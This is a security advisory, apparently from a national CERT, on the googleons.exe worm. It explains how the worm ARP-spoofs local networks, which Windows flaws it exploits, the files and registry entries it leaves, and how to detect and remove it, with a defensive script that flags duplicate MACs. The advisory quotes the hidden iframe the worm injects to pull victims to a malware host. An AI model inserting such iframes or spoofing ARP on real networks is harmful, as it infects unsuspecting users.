□ Overview
o Malware has recently appeared in Korea that spreads through ARP spoofing and paralyzes the network once a host is infected; caution is required.
o Network administrators in particular should periodically check the internal network for ARP spoofing attacks and identify the source of the attack, so that the related malware is not executed or downloaded.
□ Propagation method
o A PC initially infected with googleons.exe carries out an ARP spoofing attack
  - Once infected, it continuously sends ARP Replies to the hosts and the gateway on the network
  - It continuously sends ARP Replies that forge the gateway's MAC address and the target hosts' MAC addresses
o Hosts connected to the same network as the infected PC are made to treat the infected PC as the gateway, so all of their packets can be monitored and altered
  - When a normal host browses the web under the ARP spoofing attack, the infected PC intercepts the packets and inserts the following content, steering the host to the malware distribution site
    "<iframe src=http://down.online[omitted].net/page/image/zzh.htm height=0></iframe>"
o Of the PCs steered to the malware distribution site down.online[omitted].net, sites where the following Windows vulnerability patches have not been applied are infected with googleons.exe
  - MS05-025
  - MS06-014
  - MS07-017
  - MS07-027
□ Malicious behavior (googleons.exe)
o ARP spoofing attack against the same network range as the infected PC
o Alteration of the HTTP traffic of PCs on the same network
  - Inserts "<iframe src=http://down.online[omitted].net/page/image/zzh.htm height=0></iframe>"
o Malware propagation via USB
o Inserts the following malicious code into files with the .html, tml, asp, php, jsp extensions on the infected PC
  - "<iframe src=http://down.online[omitted].net/page/image/pd.htm height=0></iframe>"
o Files created on infection
  - C:\Document and Settings\[account]\Local Settings\Temp\
    autoexec.bat (down.exe, the initial infection malware; downloads and executes googleons.exe)
    googleons.exe
    disocoo.exe (deleted after execution)
    npptools.dll
    Packet.dll
    WanPacket.dll
    yahoons.exe (deleted after execution)
  - C:\windows\system32\ (files created by running yahoons.exe)
    dllhost32.exe
    mh104.dll
    moyu103.dll
    mosou.exe
    mydata.exe
    nwizwmgjs.exe
    nwizwmgjs.dll
    nwizzhuxians.exe
    nwizzhuxians.dll
    RAV00xx.exe and many others
o Registers itself in the registry so that it restarts after boot
  - HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  - Name: svc
  - File name: googleons.exe
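□ Checking for infection and remediation
o Checking for infection
  - Identify the infected PC on the L3 switch or router
    Check for IPs with duplicate MAC addresses (identifies the IP infected with the malware)
    ※ See the krcert homepage -> Technical Documents -> "ARP Spoofing Attacks and Countermeasures"
  - Identify the attacking PC from a PC victimized by ARP spoofing
    Ping-scan the entire network
    Check for IPs with duplicate MAC addresses
    ※ See the krcert homepage -> Technical Documents -> "ARP Spoofing Attacks and Countermeasures"
  - Confirm the PC that is infected with the malware and carrying out the ARP spoofing attack
    Check whether C:\Document and Settings\[account]\Local Settings\Temp\googleons.exe exists
    Check whether the googleons.exe process is running [see the remediation steps below]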
o Remediation
  - Delete the malicious files under C:\Document and Settings\[account]\Local Settings\Temp\
  - Delete the malicious files in the Windows system folder
  - End the googleons.exe process
    Press "Ctrl" + "Alt" + "Del", then end the googleons.exe process from the Processes menu
  - Delete registry entries
    . Delete the googleons restart registry entry
      Select Start → Run, enter "regedit", then delete the following registry entry created by the malware
      HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    . Delete other malware registry entries
      Select Start → Run, enter "regedit", then delete the following registry entry created by the malware
      HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
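
The duplicate-MAC check described under "Checking for infection", as an added example that is not part of the original advisory: it parses Windows `arp -a` output collected on a victim PC after a ping sweep and reports any unicast MAC that answers for the gateway IP and for other IPs as well. The sample output, all addresses and the function names are constructed for illustration.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample of Windows `arp -a` output taken on a victim PC after a
# ping sweep of the subnet; every address here is made up for illustration.
SAMPLE_ARP_OUTPUT = """\
Interface: 192.168.0.23 --- 0x2
  Internet Address      Physical Address      Type
  192.168.0.1           00-11-22-aa-bb-05     dynamic
  192.168.0.5           00-11-22-AA-BB-05     dynamic
  192.168.0.17          00-11-22-cc-dd-17     dynamic
  192.168.0.255         ff-ff-ff-ff-ff-ff     static
  255.255.255.255       ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# One ARP table row: IPv4 address followed by a MAC written with '-' or ':'.
ENTRY = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+((?:[0-9a-f]{2}[-:]){5}[0-9a-f]{2})\b",
    re.IGNORECASE | re.MULTILINE,
)


def is_group_address(mac):
    """Broadcast/multicast MACs (low bit of first octet set) are shared by design."""
    return int(mac[:2], 16) & 1 == 1


def duplicate_macs(arp_text):
    """Map each unicast MAC that answers for more than one IP to those IPs."""
    ips_by_mac = defaultdict(set)
    for ip, mac in ENTRY.findall(arp_text):
        mac = mac.lower().replace(":", "-")  # normalise case and separator
        if not is_group_address(mac):
            ips_by_mac[mac].add(ipaddress.ip_address(ip))
    return {mac: [str(ip) for ip in sorted(ips)]
            for mac, ips in ips_by_mac.items() if len(ips) > 1}


def spoofing_suspects(arp_text, gateway_ip):
    """Return (mac, other_ips) pairs where one MAC claims the gateway IP and
    other IPs too; the other IPs are the likely infected PC(s)."""
    return [(mac, [ip for ip in ips if ip != gateway_ip])
            for mac, ips in duplicate_macs(arp_text).items() if gateway_ip in ips]


if __name__ == "__main__":
    for mac, ips in spoofing_suspects(SAMPLE_ARP_OUTPUT, "192.168.0.1"):
        print(f"{mac} answers for the gateway and for {', '.join(ips)}")
```

Several IPs on one MAC also occur legitimately (a host with more than one address on an interface, proxy ARP), so confirm a hit with the googleons.exe file and process checks listed above.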
□ Prevention
o Preventive measures against infection
  - Apply the latest Windows OS patches